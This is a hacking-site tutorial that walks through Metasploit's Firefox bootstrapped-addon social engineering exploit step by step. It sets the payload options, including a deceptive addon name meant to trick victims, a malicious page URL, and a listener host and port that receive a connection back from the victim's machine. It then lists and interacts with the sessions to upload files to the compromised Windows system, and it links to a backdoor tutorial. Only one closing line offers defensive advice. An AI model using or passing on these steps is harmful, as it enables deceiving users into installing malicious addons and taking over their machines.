Type : Tutorial
Level : Medium
Attacker O.S : Backtrack 5R1
Victim O.S : Windows XP SP3
Vulnerable Application : none (the people are vulnerable in this case)
Exploit Credits : mihi < >
After long time with busy days finally I can wrote another tutorial about Windows Hacking. Today the tutorial was about "Mozilla Firefox Bootstrapped Addon Social Engineering Code Execution".
According to metasploit.com about this vulnerability :
This exploit dynamically creates a .xpi addon file. The resulting bootstrapped Firefox addon is presented to the victim via a web page with. The victim's Firefox browser will pop a dialog asking if they trust the addon. Once the user clicks "install", the addon is installed and executes the payload with full user permissions. As of Firefox 4, this will work without a restart as the addon is marked to be "bootstrapped". As the addon will execute the payload after each Firefox restart, an option can be given to automatically uninstall the addon once the payload has been executed.
This hacking method actually targeted users who didn't know and not aware about security issue while they installing some addons into their browsers.
1. Prepare the attack from your metasploit console(view picture below)
use the firefox xpi bootstrapped addon exploit and then set the payload (if you don't know which payload, you can use show payloads command)
2. The next step you can view the available options by using show options command, but I've already set up the necessary switch as you can see in picture below:
Information :set addonname tweak firefox to load faster --> eye catching name for social engineering purpose set srvhost 192.168.8.93 --> your server ip address run the exploit set srvport 80 --> server port to serve malicious website set uripath firefox-tweaker --> make the URL more friendly like http://192.168.8.93/firefox-tweaker set lhost 192.168.8.93 --> local ip address to receive connection from victim set lport 443 --> which port use to handle connection from victim set target 0 --> Set the default target for this exploit(firefox)
3. If everything have been set up correctly, you can run exploit commend to run the exploit server to server malicious page.
4. While user access the page http://192.168.8.93/firefox-tweaker :
and then they click "Install Now". . .
5. Our metasploit console will got something interesting over there…
By using sessions -l command we can listing the active sessions created.
6. We need to interract with the session by using sessions -i id_active_sessions and get access to victim system and upload some file there
here's on victim file explorer after I've finished upload some file :
7. After that, maybe you can view my other tutorial about set up backdoor here http://www.hacking-tutorial.com/computer/10-steps-to-use-netcat-as-a-backdoor-in-windows-7-system/
1. Make sure you install addons from developer you trust; or at least you know about the background history by googling it first.
Hope it's useful